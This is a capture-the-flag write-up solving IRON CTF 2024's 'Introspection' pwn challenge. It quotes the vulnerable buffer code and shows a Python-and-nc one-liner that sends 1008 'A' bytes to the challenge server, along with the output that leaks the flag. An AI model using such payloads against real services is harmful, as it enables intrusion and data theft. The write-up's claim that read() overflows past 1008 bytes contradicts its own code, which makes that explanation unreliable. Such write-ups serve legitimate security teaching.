IRON CTF 2024 - Introspection

# IRON CTF 2024 - Introspection **Title:** Instrospection **Description:** Know your inner self and get started with Pwn. `nc pwn.1nf1n1ty.team 31698` Files: ```bash Introspection ├── flag.txt ├── introspection └── introspection.c ``` ## Solution: I started by checking the `introspection.c` file and found out that it has a major security flaw because it uses the `read()` function without checking the limits. The program reads user input into a buffer (`buf`) of 1008 bytes, which can cause a buffer overflow if more data is provided than the buffer can accommodate. Here are the main parts of the code that show the vulnerability: 1. **Buffer Declaration:** ```c char buf[1008]; ``` The program allocates a fixed-size buffer of 1008 bytes. 2. **Input Handling:** ```c read(0, buf, 1008); ``` The `read()` function allows the user to input up to 1008 bytes. However, since there is no additional check, an attacker could provide more than 1008 bytes, causing data to overwrite adjacent memory. 3. **Adjacent Memory Access:** The buffer overflow can overwrite the memory location where the `flag` variable is stored. The flag is read from `flag.txt`, which means if the input overflows the buffer, it may alter the control flow or reveal sensitive information. To exploit this vulnerability, I crafted a payload consisting of 1008 'A' characters. By sending this payload to the server, I aimed to overflow `buf` and access the flag. I executed the following command to generate and send the payload which uses Python to create a stream of 1008 'A' and then sends it over to the server: ```bash python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 1008)' | nc pwn.1nf1n1ty.team 31698 ``` ```bash $ python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 1008)' | nc pwn.1nf1n1ty.team 31698 "Introspection is the key to unlocking your fullest potential; knowing yourself is the first step." - ChatGPT Have you thought about what you really wanted in life? >> I wish for you that you get AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAironCTF{W0w!_Y0u_Just_OverWrite_the_Nul1!} ``` And there's our flag: `ironCTF{W0w!_Y0u_Just_OverWrite_the_Nul1!}`